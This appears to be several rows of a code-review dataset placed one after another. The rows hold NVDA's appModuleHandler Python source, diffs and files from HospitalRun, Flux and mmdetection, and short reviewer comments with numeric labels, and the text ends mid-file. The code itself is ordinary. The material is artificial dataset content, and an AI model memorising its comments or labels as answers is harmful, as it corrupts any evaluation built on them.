# -*- coding: UTF-8 -*- # A part of NonVisual Desktop Access (NVDA) # Copyright (C) 2006-2019 NV Access Limited, Peter Vágner, Aleksey Sadovoy, Patrick Zajda, Joseph Lee, # Babbage B.V., Mozilla Corporation # This file is covered by the GNU General Public License. # See the file COPYING for more details. """Manages appModules. @var runningTable: a dictionary of the currently running appModules, using their application's main window handle as a key. @type runningTable: dict """ import itertools import ctypes import ctypes.wintypes import os import sys import winVersion import pkgutil import importlib import threading import tempfile import comtypes.client import baseObject import globalVars from logHandler import log import NVDAHelper import winUser import winKernel import config import NVDAObjects #Catches errors before loading default appModule import api import appModules import watchdog import extensionPoints from fileUtils import getFileVersionInfo #Dictionary of processID:appModule paires used to hold the currently running modules runningTable={} #: The process ID of NVDA itself. NVDAProcessID=None _importers=None _getAppModuleLock=threading.RLock() #: Notifies when another application is taking foreground. #: This allows components to react upon application switches. #: For example, braille triggers bluetooth polling for braille displaysf necessary. #: Handlers are called with no arguments. post_appSwitch = extensionPoints.Action() class processEntry32W(ctypes.Structure): _fields_ = [ ("dwSize",ctypes.wintypes.DWORD), ("cntUsage", ctypes.wintypes.DWORD), ("th32ProcessID", ctypes.wintypes.DWORD), ("th32DefaultHeapID", ctypes.wintypes.DWORD), ("th32ModuleID",ctypes.wintypes.DWORD), ("cntThreads",ctypes.wintypes.DWORD), ("th32ParentProcessID",ctypes.wintypes.DWORD), ("pcPriClassBase",ctypes.c_long), ("dwFlags",ctypes.wintypes.DWORD), ("szExeFile", ctypes.c_wchar * 260) ] def getAppNameFromProcessID(processID,includeExt=False): """Finds out the application name of the given process. @param processID: the ID of the process handle of the application you wish to get the name of. @type processID: int @param includeExt: C{True} to include the extension of the application's executable filename, C{False} to exclude it. @type window: bool @returns: application name @rtype: str """ if processID==NVDAProcessID: return "nvda.exe" if includeExt else "nvda" FSnapshotHandle = winKernel.kernel32.CreateToolhelp32Snapshot (2,0) FProcessEntry32 = processEntry32W() FProcessEntry32.dwSize = ctypes.sizeof(processEntry32W) ContinueLoop = winKernel.kernel32.Process32FirstW(FSnapshotHandle, ctypes.byref(FProcessEntry32)) appName = str() while ContinueLoop: if FProcessEntry32.th32ProcessID == processID: appName = FProcessEntry32.szExeFile break ContinueLoop = winKernel.kernel32.Process32NextW(FSnapshotHandle, ctypes.byref(FProcessEntry32)) winKernel.kernel32.CloseHandle(FSnapshotHandle) if not includeExt: appName=os.path.splitext(appName)[0].lower() if not appName: return appName # This might be an executable which hosts multiple apps. # Try querying the app module for the name of the app being hosted. try: mod = importlib.import_module("appModules.%s" % appName, package="appModules") return mod.getAppNameFromHost(processID) except (ImportError, AttributeError, LookupError): pass return appName def getAppModuleForNVDAObject(obj): if not isinstance(obj,NVDAObjects.NVDAObject): return return getAppModuleFromProcessID(obj.processID) def getAppModuleFromProcessID(processID): """Finds the appModule that is for the given process ID. The module is also cached for later retreavals. @param processID: The ID of the process for which you wish to find the appModule. @type processID: int @returns: the appModule, or None if there isn't one @rtype: appModule """ with _getAppModuleLock: mod=runningTable.get(processID) if not mod: # #5323: Certain executables contain dots as part of their file names. appName=getAppNameFromProcessID(processID).replace(".","_") mod=fetchAppModule(processID,appName) if not mod: raise RuntimeError("error fetching default appModule") runningTable[processID]=mod return mod def update(processID,helperLocalBindingHandle=None,inprocRegistrationHandle=None): """Tries to load a new appModule for the given process ID if need be. @param processID: the ID of the process. @type processID: int @param helperLocalBindingHandle: an optional RPC binding handle pointing to the RPC server for this process @param inprocRegistrationHandle: an optional rpc context handle representing successful registration with the rpc server for this process """ # This creates a new app module if necessary. mod=getAppModuleFromProcessID(processID) if helperLocalBindingHandle: mod.helperLocalBindingHandle=helperLocalBindingHandle if inprocRegistrationHandle: mod._inprocRegistrationHandle=inprocRegistrationHandle def cleanup(): """Removes any appModules from the cache whose process has died. """ for deadMod in [mod for mod in runningTable.values() if not mod.isAlive]: log.debug("application %s closed"%deadMod.appName) del runningTable[deadMod.processID] if deadMod in set(o.appModule for o in api.getFocusAncestors()+[api.getFocusObject()] if o and o.appModule): if hasattr(deadMod,'event_appLoseFocus'): deadMod.event_appLoseFocus() import eventHandler eventHandler.handleAppTerminate(deadMod) try: deadMod.terminate() except: log.exception("Error terminating app module %r" % deadMod) def doesAppModuleExist(name): return any(importer.find_module("appModules.%s" % name) for importer in _importers) def fetchAppModule(processID,appName): """Returns an appModule found in the appModules directory, for the given application name. @param processID: process ID for it to be associated with @type processID: integer @param appName: the application name for which an appModule should be found. @type appName: str @returns: the appModule, or None if not found @rtype: AppModule """ # First, check whether the module exists. # We need to do this separately because even though an ImportError is raised when a module can't be found, it might also be raised for other reasons. modName = appName if doesAppModuleExist(modName): try: return importlib.import_module("appModules.%s" % modName, package="appModules").AppModule(processID, appName) except: log.exception(f"error in appModule {modName!r}") import ui import speech.priorities ui.message( # Translators: This is presented when errors are found in an appModule # (example output: error in appModule explorer). _("Error in appModule %s") % modName, speechPriority=speech.priorities.Spri.NOW ) # Use the base AppModule. return AppModule(processID, appName) def reloadAppModules(): """Reloads running appModules. especially, it clears the cache of running appModules and deletes them from sys.modules. Each appModule will then be reloaded immediately. """ global appModules state = [] for mod in runningTable.values(): state.append({key: getattr(mod, key) for key in ("processID", # #2892: We must save nvdaHelperRemote handles, as we can't reinitialize without a foreground/focus event. # Also, if there is an active context handle such as a loaded buffer, # nvdaHelperRemote can't reinit until that handle dies. "helperLocalBindingHandle", "_inprocRegistrationHandle", # #5380: We must save config profile triggers so they can be cleaned up correctly. # Otherwise, they'll remain active forever. "_configProfileTrigger", ) if hasattr(mod, key)}) # #2892: Don't disconnect from nvdaHelperRemote during termination. mod._helperPreventDisconnect = True terminate() del appModules mods=[k for k,v in sys.modules.items() if k.startswith("appModules") and v is not None] for mod in mods: del sys.modules[mod] import appModules initialize() for entry in state: pid = entry.pop("processID") mod = getAppModuleFromProcessID(pid) mod.__dict__.update(entry) # The appModule property for existing NVDAObjects will now be None, since their AppModule died. # Force focus, navigator, etc. objects to re-fetch, # since NVDA depends on the appModule property for these. for obj in itertools.chain((api.getFocusObject(), api.getNavigatorObject()), api.getFocusAncestors()): try: del obj._appModuleRef except AttributeError: continue # Fetch and cache right away; the process could die any time. obj.appModule def initialize(): """Initializes the appModule subsystem. """ global NVDAProcessID,_importers NVDAProcessID=os.getpid() config.addConfigDirsToPythonPackagePath(appModules) _importers=list(pkgutil.iter_importers("appModules.__init__")) def terminate(): for processID, app in runningTable.items(): try: app.terminate() except: log.exception("Error terminating app module %r" % app) runningTable.clear() def handleAppSwitch(oldMods, newMods): newModsSet = set(newMods) processed = set() nextStage = [] if not oldMods or oldMods[-1].appName != newMods[-1].appName: post_appSwitch.notify() # Determine all apps that are losing focus and fire appropriate events. for mod in reversed(oldMods): if mod in processed: # This app has already been handled. continue processed.add(mod) if mod in newModsSet: # This app isn't losing focus. continue processed.add(mod) # This app is losing focus. nextStage.append(mod) if not mod.sleepMode and hasattr(mod,'event_appModule_loseFocus'): try: mod.event_appModule_loseFocus() except watchdog.CallCancelled: pass nvdaGuiLostFocus = nextStage and nextStage[-1].appName == "nvda" if not nvdaGuiLostFocus and (not oldMods or oldMods[-1].appName != "nvda") and newMods[-1].appName == "nvda": # NVDA's GUI just got focus. import gui if gui.shouldConfigProfileTriggersBeSuspended(): config.conf.suspendProfileTriggers() with config.conf.atomicProfileSwitch(): # Exit triggers for apps that lost focus. for mod in nextStage: mod._configProfileTrigger.exit() mod._configProfileTrigger = None nextStage = [] # Determine all apps that are gaining focus and enter triggers. for mod in newMods: if mod in processed: # This app isn't gaining focus or it has already been handled. continue processed.add(mod) # This app is gaining focus. nextStage.append(mod) trigger = mod._configProfileTrigger = AppProfileTrigger(mod.appName) trigger.enter() if nvdaGuiLostFocus: import gui if not gui.shouldConfigProfileTriggersBeSuspended(): config.conf.resumeProfileTriggers() # Fire appropriate events for apps gaining focus. for mod in nextStage: if not mod.sleepMode and hasattr(mod,'event_appModule_gainFocus'): mod.event_appModule_gainFocus() #base class for appModules class AppModule(baseObject.ScriptableObject): """Base app module. App modules provide specific support for a single application. Each app module should be a Python module or a package in the appModules package named according to the executable it supports; e.g. explorer.py for the explorer.exe application or firefox/__init__.py for firefox.exe. It should containa C{AppModule} class which inherits from this base class. App modules can implement and bind gestures to scripts. These bindings will only take effect while an object in the associated application has focus. See L{ScriptableObject} for details. App modules can also receive NVDAObject events for objects within the associated application. This is done by implementing methods called C{event_eventName}, where C{eventName} is the name of the event; e.g. C{event_gainFocus}. These event methods take two arguments: the NVDAObject on which the event was fired and a callable taking no arguments which calls the next event handler. Some executables host many different applications; e.g. javaw.exe. In this case, it is desirable that a specific app module be loaded for each actual application, rather than the one for the hosting executable. To support this, the module for the hosting executable (not the C{AppModule} class within it) can implement the function C{getAppNameFromHost(processId)}, where C{processId} is the id of the host process. It should return a unicode string specifying the name that should be used. Alternatively, it can raise C{LookupError} if a name couldn't be determined. """ #: Whether NVDA should sleep while in this application (e.g. the application is self-voicing). #: If C{True}, all events and script requests inside this application are silently dropped. #: @type: bool sleepMode=False def __init__(self,processID,appName=None): super(AppModule,self).__init__() #: The ID of the process this appModule is for. #: @type: int self.processID=processID if appName is None: appName=getAppNameFromProcessID(processID) #: The application name. #: @type: str self.appName=appName self.processHandle=winKernel.openProcess(winKernel.SYNCHRONIZE|winKernel.PROCESS_QUERY_INFORMATION,False,processID) self.helperLocalBindingHandle=None self._inprocRegistrationHandle=None def _getExecutableFileInfo(self): # Used for obtaining file name and version for the executable. # This is needed in case immersive app package returns an error, # dealing with a native app, or a converted desktop app. # Create the buffer to get the executable name exeFileName = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH) length = ctypes.wintypes.DWORD(ctypes.wintypes.MAX_PATH) if not ctypes.windll.Kernel32.QueryFullProcessImageNameW( self.processHandle, 0, exeFileName, ctypes.byref(length) ): raise ctypes.WinError() fileName = exeFileName.value fileinfo = getFileVersionInfo(fileName, "ProductName", "ProductVersion") return (fileinfo["ProductName"], fileinfo["ProductVersion"]) def _getImmersivePackageInfo(self): # Used to obtain full package structure for a hosted app. # The package structure consists of product name, version, architecture, language, and app ID. # This is useful for confirming whether an app is hosted or not despite an app reporting otherwise. # Some apps such as File Explorer says it is an immersive process but error 15700 is shown. # Others such as Store version of Office are not truly hosted apps but are distributed via Store. length = ctypes.c_uint() ctypes.windll.kernel32.GetPackageFullName(self.processHandle, ctypes.byref(length), None) packageFullName = ctypes.create_unicode_buffer(length.value) if ctypes.windll.kernel32.GetPackageFullName( self.processHandle, ctypes.byref(length), packageFullName ) == 0: return packageFullName.value else: return None def _setProductInfo(self): """Set productName and productVersion attributes. There are at least two ways of obtaining product info for an app: * Package info for hosted apps * File version info for other apps and for some hosted apps """ # Sometimes (I.E. when NVDA starts) handle is 0, so stop if it is the case if not self.processHandle: raise RuntimeError("processHandle is 0") # No need to worry about immersive (hosted) apps and friends until Windows 8. if winVersion.getWinVer() >= winVersion.WIN8: # Some apps such as File Explorer says it is an immersive process but error 15700 is shown. # Therefore resort to file version info behavior because it is not a hosted app. # Others such as Store version of Office are not truly hosted apps, # yet returns an internal version anyway because they are converted desktop apps. # For immersive apps, default implementation is generic - returns Windows version information. # Thus probe package full name and parse the serialized representation of package info structure. packageInfo = self._getImmersivePackageInfo() if packageInfo is not None: # Product name is of the form publisher.name for a hosted app. productInfo = packageInfo.split("_") else: # File Explorer and friends which are really native aps. productInfo = self._getExecutableFileInfo() else: # Not only native apps, but also some converted desktop aps such as Office. productInfo = self._getExecutableFileInfo() self.productName = productInfo[0] self.productVersion = productInfo[1] def _get_productName(self): self._setProductInfo() return self.productName def _get_productVersion(self): self._setProductInfo() return self.productVersion def __repr__(self): return "<%r (appName %r, process ID %s) at address %x>"%(self.appModuleName,self.appName,self.processID,id(self)) def _get_appModuleName(self): return self.__class__.__module__.split('.')[-1] def _get_isAlive(self): return bool(winKernel.waitForSingleObject(self.processHandle,0)) def terminate(self): """Terminate this app module. This is called to perform any clean up when this app module is being destroyed. Subclasses should call the superclass method first. """ winKernel.closeHandle(self.processHandle) if getattr(self, "_helperPreventDisconnect", False): return if self._inprocRegistrationHandle: ctypes.windll.rpcrt4.RpcSsDestroyClientContext(ctypes.byref(self._inprocRegistrationHandle)) if self.helperLocalBindingHandle: ctypes.windll.rpcrt4.RpcBindingFree(ctypes.byref(self.helperLocalBindingHandle)) def chooseNVDAObjectOverlayClasses(self, obj, clsList): """Choose NVDAObject overlay classes for a given NVDAObject. This is called when an NVDAObject is being instantiated after L{NVDAObjects.NVDAObject.findOverlayClasses} has been called on the API-level class. This allows an AppModule to add or remove overlay classes. See L{NVDAObjects.NVDAObject.findOverlayClasses} for details about overlay classes. @param obj: The object being created. @type obj: L{NVDAObjects.NVDAObject} @param clsList: The list of classes, which will be modified by this method if appropriate. @type clsList: list of L{NVDAObjects.NVDAObject} """ # optimisation: Make it easy to detect that this hasn't been overridden. chooseNVDAObjectOverlayClasses._isBase = True def _get_appPath(self): """Returns the full path for the executable e.g. 'C:\\Windows\\explorer.exe' for Explorer. @rtype: str """ size = ctypes.wintypes.DWORD(ctypes.wintypes.MAX_PATH) path = ctypes.create_unicode_buffer(size.value) winKernel.kernel32.QueryFullProcessImageNameW(self.processHandle, 0, path, ctypes.byref(size)) self.appPath = path.value if path else None return self.appPath def _get_is64BitProcess(self): """Whether the underlying process is a 64 bit process. @rtype: bool """ if os.environ.get("PROCESSOR_ARCHITEW6432") not in ("AMD64","ARM64"): # This is 32 bit Windows. self.is64BitProcess = False return False try: # We need IsWow64Process2 to detect WOW64 on ARM64. processMachine = ctypes.wintypes.USHORT() if ctypes.windll.kernel32.IsWow64Process2(self.processHandle, ctypes.byref(processMachine), None) == 0: self.is64BitProcess = False return False # IMAGE_FILE_MACHINE_UNKNOWN if not a WOW64 process. self.is64BitProcess = processMachine.value == winKernel.IMAGE_FILE_MACHINE_UNKNOWN except AttributeError: # IsWow64Process2 is only supported on Windows 10 version 1511 and later. # Fall back to IsWow64Process. res = ctypes.wintypes.BOOL() if ctypes.windll.kernel32.IsWow64Process(self.processHandle, ctypes.byref(res)) == 0: self.is64BitProcess = False return False self.is64BitProcess = not res return self.is64BitProcess def _get_isWindowsStoreApp(self): """Whether this process is a Windows Store (immersive) process. An immersive process is a Windows app that runs inside a Windows Runtime (WinRT) container. These include Windows store apps on Windows 8 and 8.1, and Universal Windows Platform (UWP) apps on Windows 10. A special case is a converted desktop app distributed on Microsoft Store. Not all immersive apps are packaged as a true Store app with a package info e.g. File Explorer reports itself as immersive when it is not. @rtype: bool """ if winVersion.getWinVer() < winVersion.WIN8: # Windows Store/UWP apps were introduced in Windows 8. self.isWindowsStoreApp = False return False # Package info is much more accurate than IsImmersiveProcess # because IsImmersive Process returns nonzero for File Explorer # and zero for Store version of Office. if self._getImmersivePackageInfo() is not None: self.isWindowsStoreApp = True return True self.isWindowsStoreApp = False return self.isWindowsStoreApp def _get_appArchitecture(self): """Returns the target architecture for the specified app. This is useful for detecting X86/X64 apps running on ARM64 releases of Windows 10. The following strings are returned: * x86: 32-bit x86 app on 32-bit or 64-bit Windows. * AMD64: x64 app on x64 or ARM64 Windows. * ARM: 32-bit ARM app on ARM64 Windows. * ARM64: 64-bit ARM app on ARM64 Windows. @rtype: str """ # Details: https://docs.microsoft.com/en-us/windows/desktop/SysInfo/image-file-machine-constants # The only value missing is ARM64 (AA64) # because it is only applicable if ARM64 app is running on ARM64 machines. archValues2ArchNames = { 0x014c: "x86", # I386-32 0x8664: "AMD64", # X86-64 0x01c0: "ARM" # 32-bit ARM } # IsWow64Process2 can be used on Windows 10 Version 1511 (build 10586) and later. # Just assume this is an x64 (AMD64) app. # if this is a64-bit app running on 7 through 10 Version 1507 (build 10240). try: # If a native app is running (such as x64 app on x64 machines), app architecture value is not set. processMachine = ctypes.wintypes.USHORT() ctypes.windll.kernel32.IsWow64Process2(self.processHandle, ctypes.byref(processMachine), None) if not processMachine.value: self.appArchitecture = os.environ.get("PROCESSOR_ARCHITEW6432") else: # On ARM64, two 32-bit architectures are supported: x86 (via emulation) and ARM (natively). self.appArchitecture = archValues2ArchNames[processMachine.value] except AttributeError: # Windows 10 Version 1507 (build 10240) and earlier. self.appArchitecture = "AMD64" if self.is64BitProcess else "x86" return self.appArchitecture def isGoodUIAWindow(self,hwnd): """ returns C{True} if the UIA implementation of the given window must be used, regardless whether native or not. This function is the counterpart of and takes precedence over L{isBadUIAWindow}. If both functions return C{False}, the decision of whether to use UIA for the window is left to core. Warning: this may be called outside of NVDA's main thread, therefore do not try accessing NVDAObjects and such, rather just check window class names. """ return False def isBadUIAWindow(self,hwnd): """ returns C{True} if the UIA implementation of the given window must be ignored due to it being broken in some way. This function is the counterpart of L{isGoodUIAWindow}. When both functions return C{True}, L{isGoodUIAWindow} takes precedence. If both functions return C{False}, the decision of whether to use UIA for the window is left to core. Warning: this may be called outside of NVDA's main thread, therefore do not try accessing NVDAObjects and such, rather just check window class names. """ return False def shouldProcessUIAPropertyChangedEvent(self, sender, propertyId): """ Determines whether NVDA should process a UIA property changed event. Returning False will cause the event to be dropped completely. This can be used to work around UIA implementations which flood events and cause poor performance. Returning True means that the event will be processed, but it might still be rejected later; e.g. because it isn't native UIA, because shouldAcceptEvent returns False, etc. """ return True def dumpOnCrash(self): """Request that this process writes a minidump when it crashes for debugging. This should only be called if instructed by a developer. """ path = os.path.join(tempfile.gettempdir(), "nvda_crash_%s_%d.dmp" % (self.appName, self.processID)) NVDAHelper.localLib.nvdaInProcUtils_dumpOnCrash( self.helperLocalBindingHandle, path) print("Dump path: %s" % path) def _get_statusBar(self): """Retrieve the status bar object of the application. If C{NotImplementedError} is raised, L{api.getStatusBar} will resort to perform a lookup by position. If C{None} is returned, L{GlobalCommands.script_reportStatusLine} will in turn resort to reading the bottom line of text written to the display. @rtype: NVDAObject """ raise NotImplementedError() def _get_statusBarTextInfo(self): """Retrieve a L{TextInfo} positioned at the status bar of the application. This is used by L{GlobalCommands.script_reportStatusLine} in cases where L{api.getStatusBar} could not locate a proper L{NVDAObject} for the status bar. For this method to get called, L{_get_statusBar} must return C{None}. @rtype: TextInfo """ raise NotImplementedError() class AppProfileTrigger(config.ProfileTrigger): """A configuration profile trigger for when a particular application has focus. """ def __init__(self, appName): self.spec = "app:%s" % appName def getWmiProcessInfo(processId): """Retrieve the WMI Win32_Process class instance for a given process. For details about the available properties, see http://msdn.microsoft.com/en-us/library/aa394372%28v=vs.85%29.aspx @param processId: The id of the process in question. @type processId: int @return: The WMI Win32_Process class instance. @raise LookupError: If there was an error retrieving the instance. """ try: wmi = comtypes.client.CoGetObject(r"winmgmts:root\cimv2", dynamic=True) results = wmi.ExecQuery("select * from Win32_Process " "where ProcessId = %d" % processId) for result in results: return result except: raise LookupError("Couldn't get process information using WMI") raise LookupError("No such process")
1
34,135
Could we have this initialization as part of the initialize method?
nvaccess-nvda
py
@@ -15,7 +15,7 @@ export default AbstractEditController.extend({ showUpdateButton: true, database: inject.service(), - editController: inject.controller('patients/edit'), + editController: null, filesystem: inject.service(), photoFileNotSet: computed('model.photoFile', function() {
1
import AbstractEditController from 'hospitalrun/controllers/abstract-edit-controller'; import Ember from 'ember'; import { translationMacro as t } from 'ember-i18n'; const { computed, get, inject, isEmpty, RSVP, set } = Ember; export default AbstractEditController.extend({ addAction: 'addPhoto', editTitle: t('patients.titles.editPhoto'), fileRequiredMessage: t('patients.messages.photoFileRequired'), modelName: 'photo', newTitle: t('patients.titles.addPhoto'), newModel: false, showFileRequired: false, showUpdateButton: true, database: inject.service(), editController: inject.controller('patients/edit'), filesystem: inject.service(), photoFileNotSet: computed('model.photoFile', function() { let model = get(this, 'model'); let isNew = get(model, 'isNew'); let photoFile = get(model, 'photoFile'); return (isNew && isEmpty(photoFile)); }), title: computed('model.isNew', function() { let isNew = get(this, 'model.isNew'); if (isNew) { return get(this, 'newTitle'); } else { return get(this, 'editTitle'); } }), updateButtonAction: computed('photoFileNotSet', function() { let photoFileNotSet = get(this, 'photoFileNotSet'); if (photoFileNotSet) { return 'showFileRequired'; } else { set(this, 'showFileRequired', false); return 'update'; } }), updateButtonClass: computed('photoFileNotSet', function() { let photoFileNotSet = get(this, 'photoFileNotSet'); if (photoFileNotSet) { return 'disabled-btn'; } }), afterUpdate(model) { let isNew = get(this, 'newModel'); let editController = get(this, 'editController'); if (isNew) { let photoFile = get(model, 'photoFile'); let saveToDir = get(model, 'saveToDir'); let fileSystem = get(this, 'filesystem'); let modelName = get(this, 'modelName'); let pouchDbId = get(this, 'database').getPouchId(get(model, 'id'), modelName); fileSystem.addFile(photoFile, saveToDir, pouchDbId).then((fileEntry) => { model.setProperties({ localFile: true, fileName: fileEntry.fullPath, url: fileEntry.toURL() }); model.save().then(() => { editController.send(get(this, 'addAction'), model); }).catch((err) => { throw err; }); }); } else { this.send('closeModal'); } }, beforeUpdate() { let model = get(this, 'model'); let photoFile = get(model, 'photoFile'); let isImage = get(model, 'isImage'); let isNew = get(model, 'isNew'); set(this, 'newModel', isNew); if (isNew) { model.setProperties({ files: [Ember.Object.create({ content_type: photoFile.type, data: photoFile, name: 'file' })], isImage }); } return RSVP.resolve(); }, actions: { cancel() { this.send('closeModal'); }, showFileRequired() { set(this, 'showFileRequired', true); } } });
1
13,725
This line should be removed as editController is not used from this context anymore.
HospitalRun-hospitalrun-frontend
js
@@ -9,11 +9,17 @@ import ( "github.com/influxdata/flux/plan" ) +// Transformation represents functions that control of how the execution +// engine will take in a flux Table, perform the necessary data processing +// and return an output flux Table type Transformation interface { RetractTable(id DatasetID, key flux.GroupKey) error + // Process takes in a flux Table, performs data processing on it + // and produces an output flux Table Process(id DatasetID, tbl flux.Table) error UpdateWatermark(id DatasetID, t Time) error UpdateProcessingTime(id DatasetID, t Time) error + // Finish indicates that the Transformation is complete Finish(id DatasetID, err error) }
1
package execute import ( "context" "fmt" "github.com/influxdata/flux" "github.com/influxdata/flux/memory" "github.com/influxdata/flux/plan" ) type Transformation interface { RetractTable(id DatasetID, key flux.GroupKey) error Process(id DatasetID, tbl flux.Table) error UpdateWatermark(id DatasetID, t Time) error UpdateProcessingTime(id DatasetID, t Time) error Finish(id DatasetID, err error) } // StreamContext represents necessary context for a single stream of // query data. type StreamContext interface { Bounds() *Bounds } type Administration interface { Context() context.Context ResolveTime(qt flux.Time) Time StreamContext() StreamContext Allocator() *memory.Allocator Parents() []DatasetID Dependencies() Dependencies } // Dependencies represents the provided dependencies to the execution environment. // The dependencies is opaque. type Dependencies map[string]interface{} type CreateTransformation func(id DatasetID, mode AccumulationMode, spec plan.ProcedureSpec, a Administration) (Transformation, Dataset, error) type CreateNewPlannerTransformation func(id DatasetID, mode AccumulationMode, spec plan.ProcedureSpec, a Administration) (Transformation, Dataset, error) var procedureToTransformation = make(map[plan.ProcedureKind]CreateNewPlannerTransformation) // RegisterTransformation adds a new registration mapping of procedure kind to transformation. func RegisterTransformation(k plan.ProcedureKind, c CreateNewPlannerTransformation) { if procedureToTransformation[k] != nil { panic(fmt.Errorf("duplicate registration for transformation with procedure kind %v", k)) } procedureToTransformation[k] = c } // ReplaceTransformation changes an existing transformation registration. func ReplaceTransformation(k plan.ProcedureKind, c CreateNewPlannerTransformation) { if procedureToTransformation[k] == nil { panic(fmt.Errorf("missing registration for transformation with procedure kind %v", k)) } procedureToTransformation[k] = c }
1
11,750
This is correct in concept but the method signature doesn't really communicate the same thing. In other words, if the function produces an output table where is it? Its not on the function signature. Can you explain where the output table is created?
influxdata-flux
go
@@ -238,9 +238,14 @@ class DetectoRS_ResNet(ResNet): pretrained=None, init_cfg=None, **kwargs): - assert init_cfg is None, 'To prevent abnormal initialization ' \ - 'behavior, init_cfg is not allowed to be set' - self.pretrained = pretrained + self.init_cfg = init_cfg + if init_cfg is not None: # init_cfg priority > pretrained + self.pretrained = init_cfg['checkpoint'] + else: + if pretrained is not None: + self.pretrained = pretrained + else: + self.pretrained = None self.sac = sac self.stage_with_sac = stage_with_sac self.rfp_inplanes = rfp_inplanes
1
import torch.nn as nn import torch.utils.checkpoint as cp from mmcv.cnn import (build_conv_layer, build_norm_layer, constant_init, kaiming_init) from mmcv.runner import Sequential, load_checkpoint from torch.nn.modules.batchnorm import _BatchNorm from mmdet.utils import get_root_logger from ..builder import BACKBONES from .resnet import BasicBlock from .resnet import Bottleneck as _Bottleneck from .resnet import ResNet class Bottleneck(_Bottleneck): r"""Bottleneck for the ResNet backbone in `DetectoRS <https://arxiv.org/pdf/2006.02334.pdf>`_. This bottleneck allows the users to specify whether to use SAC (Switchable Atrous Convolution) and RFP (Recursive Feature Pyramid). Args: inplanes (int): The number of input channels. planes (int): The number of output channels before expansion. rfp_inplanes (int, optional): The number of channels from RFP. Default: None. If specified, an additional conv layer will be added for ``rfp_feat``. Otherwise, the structure is the same as base class. sac (dict, optional): Dictionary to construct SAC. Default: None. init_cfg (dict or list[dict], optional): Initialization config dict. Default: None """ expansion = 4 def __init__(self, inplanes, planes, rfp_inplanes=None, sac=None, init_cfg=None, **kwargs): super(Bottleneck, self).__init__( inplanes, planes, init_cfg=init_cfg, **kwargs) assert sac is None or isinstance(sac, dict) self.sac = sac self.with_sac = sac is not None if self.with_sac: self.conv2 = build_conv_layer( self.sac, planes, planes, kernel_size=3, stride=self.conv2_stride, padding=self.dilation, dilation=self.dilation, bias=False) self.rfp_inplanes = rfp_inplanes if self.rfp_inplanes: self.rfp_conv = build_conv_layer( None, self.rfp_inplanes, planes * self.expansion, 1, stride=1, bias=True) if init_cfg is None: self.init_cfg = dict( type='Constant', val=0, override=dict(name='rfp_conv')) def rfp_forward(self, x, rfp_feat): """The forward function that also takes the RFP features as input.""" def _inner_forward(x): identity = x out = self.conv1(x) out = self.norm1(out) out = self.relu(out) if self.with_plugins: out = self.forward_plugin(out, self.after_conv1_plugin_names) out = self.conv2(out) out = self.norm2(out) out = self.relu(out) if self.with_plugins: out = self.forward_plugin(out, self.after_conv2_plugin_names) out = self.conv3(out) out = self.norm3(out) if self.with_plugins: out = self.forward_plugin(out, self.after_conv3_plugin_names) if self.downsample is not None: identity = self.downsample(x) out += identity return out if self.with_cp and x.requires_grad: out = cp.checkpoint(_inner_forward, x) else: out = _inner_forward(x) if self.rfp_inplanes: rfp_feat = self.rfp_conv(rfp_feat) out = out + rfp_feat out = self.relu(out) return out class ResLayer(Sequential): """ResLayer to build ResNet style backbone for RPF in detectoRS. The difference between this module and base class is that we pass ``rfp_inplanes`` to the first block. Args: block (nn.Module): block used to build ResLayer. inplanes (int): inplanes of block. planes (int): planes of block. num_blocks (int): number of blocks. stride (int): stride of the first block. Default: 1 avg_down (bool): Use AvgPool instead of stride conv when downsampling in the bottleneck. Default: False conv_cfg (dict): dictionary to construct and config conv layer. Default: None norm_cfg (dict): dictionary to construct and config norm layer. Default: dict(type='BN') downsample_first (bool): Downsample at the first block or last block. False for Hourglass, True for ResNet. Default: True rfp_inplanes (int, optional): The number of channels from RFP. Default: None. If specified, an additional conv layer will be added for ``rfp_feat``. Otherwise, the structure is the same as base class. """ def __init__(self, block, inplanes, planes, num_blocks, stride=1, avg_down=False, conv_cfg=None, norm_cfg=dict(type='BN'), downsample_first=True, rfp_inplanes=None, **kwargs): self.block = block assert downsample_first, f'downsample_first={downsample_first} is ' \ 'not supported in DetectoRS' downsample = None if stride != 1 or inplanes != planes * block.expansion: downsample = [] conv_stride = stride if avg_down and stride != 1: conv_stride = 1 downsample.append( nn.AvgPool2d( kernel_size=stride, stride=stride, ceil_mode=True, count_include_pad=False)) downsample.extend([ build_conv_layer( conv_cfg, inplanes, planes * block.expansion, kernel_size=1, stride=conv_stride, bias=False), build_norm_layer(norm_cfg, planes * block.expansion)[1] ]) downsample = nn.Sequential(*downsample) layers = [] layers.append( block( inplanes=inplanes, planes=planes, stride=stride, downsample=downsample, conv_cfg=conv_cfg, norm_cfg=norm_cfg, rfp_inplanes=rfp_inplanes, **kwargs)) inplanes = planes * block.expansion for _ in range(1, num_blocks): layers.append( block( inplanes=inplanes, planes=planes, stride=1, conv_cfg=conv_cfg, norm_cfg=norm_cfg, **kwargs)) super(ResLayer, self).__init__(*layers) @BACKBONES.register_module() class DetectoRS_ResNet(ResNet): """ResNet backbone for DetectoRS. Args: sac (dict, optional): Dictionary to construct SAC (Switchable Atrous Convolution). Default: None. stage_with_sac (list): Which stage to use sac. Default: (False, False, False, False). rfp_inplanes (int, optional): The number of channels from RFP. Default: None. If specified, an additional conv layer will be added for ``rfp_feat``. Otherwise, the structure is the same as base class. output_img (bool): If ``True``, the input image will be inserted into the starting position of output. Default: False. """ arch_settings = { 50: (Bottleneck, (3, 4, 6, 3)), 101: (Bottleneck, (3, 4, 23, 3)), 152: (Bottleneck, (3, 8, 36, 3)) } def __init__(self, sac=None, stage_with_sac=(False, False, False, False), rfp_inplanes=None, output_img=False, pretrained=None, init_cfg=None, **kwargs): assert init_cfg is None, 'To prevent abnormal initialization ' \ 'behavior, init_cfg is not allowed to be set' self.pretrained = pretrained self.sac = sac self.stage_with_sac = stage_with_sac self.rfp_inplanes = rfp_inplanes self.output_img = output_img super(DetectoRS_ResNet, self).__init__(**kwargs) self.inplanes = self.stem_channels self.res_layers = [] for i, num_blocks in enumerate(self.stage_blocks): stride = self.strides[i] dilation = self.dilations[i] dcn = self.dcn if self.stage_with_dcn[i] else None sac = self.sac if self.stage_with_sac[i] else None if self.plugins is not None: stage_plugins = self.make_stage_plugins(self.plugins, i) else: stage_plugins = None planes = self.base_channels * 2**i res_layer = self.make_res_layer( block=self.block, inplanes=self.inplanes, planes=planes, num_blocks=num_blocks, stride=stride, dilation=dilation, style=self.style, avg_down=self.avg_down, with_cp=self.with_cp, conv_cfg=self.conv_cfg, norm_cfg=self.norm_cfg, 